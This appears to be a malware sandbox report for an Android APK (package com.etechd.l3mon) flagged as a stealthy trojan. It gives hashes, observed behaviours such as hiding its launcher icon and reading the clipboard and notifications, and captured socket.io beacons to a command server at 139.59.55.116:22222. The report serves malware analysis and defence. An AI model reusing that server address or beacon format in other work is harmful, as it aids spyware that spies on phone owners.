Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

build.s.apk

android-9-x86

8

build.s.apk

android-10-x64

8

build.s.apk

android-11-x64

8

Analysis

  • max time kernel
    6s
  • max time network
    151s
  • platform
    android-11_x64
  • resource
    android-x64-arm64-20240910-en
  • resource tags

    arch:armarch:arm64arch:x64arch:x86image:android-x64-arm64-20240910-enlocale:en-usos:android-11-x64system
  • submitted
    06/12/2024, 15:37 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    build.s.apk

  • Size

    267KB

  • MD5

    6ef5af90e55da3e3060a2a3daca75e8f

  • SHA1

    1d8fb6a2061feb0b3493591bd18b13dd7ebc67e3

  • SHA256

    1d000ef8d964ba22acf820debd2c24222ff34353c145d69e4266eb2cc7588ba3

  • SHA512

    be954dc69c6b800141ba83d492fa5b5de880f2abe9f4cf455a6813f3f835babf755dd3ff11fc71cd150b3376630aa24ca51cce2e62dc487d0f8d4ffbb9e3d302

  • SSDEEP

    6144:VGXDhYcKa6we5EoC29CZQORrWLn6BuEIQbq3AxrqbvNv90F:VFRpR5FCsC9rWL6HBe3sqB9Y

Score
8/10
collectioncredential_accessevasionimpactstealthtrojan

Malware Config

Signatures

Processes

  • com.etechd.l3mon
    1⤵
    • Removes its main activity from the application launcher
    • Obtains sensitive information copied to the device clipboard
    • Requests accessing notifications (often used to intercept notifications before users become aware).
    PID:4816

Network

  • flag-us
    DNS
    www.youtube.com
    Remote address:
    1.1.1.1:53
    Request
    www.youtube.com
    IN A
    Response
    www.youtube.com
    IN CNAME
    youtube-ui.l.google.com
    youtube-ui.l.google.com
    IN A
    172.217.16.238
    youtube-ui.l.google.com
    IN A
    172.217.169.14
    youtube-ui.l.google.com
    IN A
    142.250.178.14
    youtube-ui.l.google.com
    IN A
    142.250.180.14
    youtube-ui.l.google.com
    IN A
    142.250.179.238
    youtube-ui.l.google.com
    IN A
    216.58.204.78
    youtube-ui.l.google.com
    IN A
    172.217.169.46
    youtube-ui.l.google.com
    IN A
    142.250.187.238
    youtube-ui.l.google.com
    IN A
    142.250.200.46
    youtube-ui.l.google.com
    IN A
    216.58.213.14
    youtube-ui.l.google.com
    IN A
    142.250.187.206
    youtube-ui.l.google.com
    IN A
    216.58.201.110
    youtube-ui.l.google.com
    IN A
    216.58.212.206
    youtube-ui.l.google.com
    IN A
    142.250.200.14
  • flag-us
    DNS
    android.apis.google.com
    Remote address:
    1.1.1.1:53
    Request
    android.apis.google.com
    IN A
    Response
    android.apis.google.com
    IN CNAME
    clients.l.google.com
    clients.l.google.com
    IN A
    142.250.179.238
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&release=11&manf=Google
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&release=11&manf=Google HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 139.59.55.116:22222
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 104
    Access-Control-Allow-Origin: *
    Set-Cookie: io=Ir0Ntgjo4E_TdUyRAAAC; Path=/; HttpOnly; SameSite=Strict
    Date: Fri, 06 Dec 2024 15:37:20 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 139.59.55.116:22222
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 16
    Access-Control-Allow-Origin: *
    Set-Cookie: io=Ir0Ntgjo4E_TdUyRAAAC; Path=/; HttpOnly; SameSite=Strict
    Date: Fri, 06 Dec 2024 15:37:20 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC HTTP/1.1
    User-Agent: Dalvik/2.1.0 (Linux; U; Android 11; Pixel 2 Build/RSR1.210722.013)
    Host: 139.59.55.116:22222
    Connection: Keep-Alive
    Accept-Encoding: gzip
    Response
    HTTP/1.1 200 OK
    Content-Type: text/plain; charset=UTF-8
    Content-Length: 3
    Access-Control-Allow-Origin: *
    Set-Cookie: io=Ir0Ntgjo4E_TdUyRAAAC; Path=/; HttpOnly; SameSite=Strict
    Date: Fri, 06 Dec 2024 15:37:20 GMT
    Connection: keep-alive
    Keep-Alive: timeout=5
  • flag-in
    GET
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    Remote address:
    139.59.55.116:22222
    Request
    GET /socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC HTTP/1.1
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Key: zEG2Er3Ggok4/hLNGZbPQA==
    Sec-WebSocket-Version: 13
    Host: 139.59.55.116:22222
    Accept-Encoding: gzip
    User-Agent: okhttp/3.5.0
    Response
    HTTP/1.1 101 Switching Protocols
    Upgrade: websocket
    Connection: Upgrade
    Sec-WebSocket-Accept: cesk/Q/svl/xCPQowiVARWCwJbs=
  • flag-us
    DNS
    ssl.google-analytics.com
    Remote address:
    1.1.1.1:53
    Request
    ssl.google-analytics.com
    IN A
    Response
    ssl.google-analytics.com
    IN A
    142.250.187.232
  • 216.239.38.223:443
    https
    336 B
     40 B
     1
    1
  • 142.250.187.238:443
    tls, https
    1.4kB
     40 B
     1
    1
  • 172.217.16.238:443
    www.youtube.com
    tls
    2.1kB
     8.3kB
     18
    15
  • 142.250.179.238:443
    android.apis.google.com
    tls
    2.6kB
     6.1kB
     13
    11
  • 142.250.179.238:443
    android.apis.google.com
    tls
    2.7kB
     6.1kB
     13
    11
  • 139.59.55.116:22222
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    http
    1.3kB
     1.3kB
     9
    7

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&release=11&manf=Google

    HTTP Response

    200

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC

    HTTP Response

    200

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=polling&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC

    HTTP Response

    200
  • 139.59.55.116:22222
    http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC
    http
    1.3kB
     732 B
     17
    11

    HTTP Request

    GET http://139.59.55.116:22222/socket.io/?release=11&model=Pixel%202&EIO=3&id=c2f38e5b9f9f9194&transport=websocket&manf=Google&sid=Ir0Ntgjo4E_TdUyRAAAC

    HTTP Response

    101
  • 142.250.187.232:443
    ssl.google-analytics.com
    tls
    1.3kB
     6.3kB
     9
    9
  • 142.250.200.46:443
    www.youtube.com
    tls
    135 B
     40 B
     2
    1
  • 142.250.200.33:443
    tls
    135 B
     40 B
     2
    1
  • 216.239.38.223:443
    tls, https
    128 B
     40 B
     2
    1
  • 216.58.204.65:443
    tls
    135 B
     40 B
     2
    1
  • 216.239.38.223:443
    tls, https
    128 B
     40 B
     2
    1
  • 224.0.0.251:5353
    3.7kB
     11
  • 1.1.1.1:53
    www.youtube.com
    dns
    61 B
     319 B
     1
    1

    DNS Request

    www.youtube.com

    DNS Response

    172.217.16.238
    172.217.169.14
    142.250.178.14
    142.250.180.14
    142.250.179.238
    216.58.204.78
    172.217.169.46
    142.250.187.238
    142.250.200.46
    216.58.213.14
    142.250.187.206
    216.58.201.110
    216.58.212.206
    142.250.200.14

  • 1.1.1.1:53
    android.apis.google.com
    dns
    69 B
     109 B
     1
    1

    DNS Request

    android.apis.google.com

    DNS Response

    142.250.179.238

  • 172.217.16.238:443
    www.youtube.com
    https
    1.4kB
     54 B
     1
    1
  • 1.1.1.1:53
    ssl.google-analytics.com
    dns
    70 B
     86 B
     1
    1

    DNS Request

    ssl.google-analytics.com

    DNS Response

    142.250.187.232

MITRE ATT&CK Mobile v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.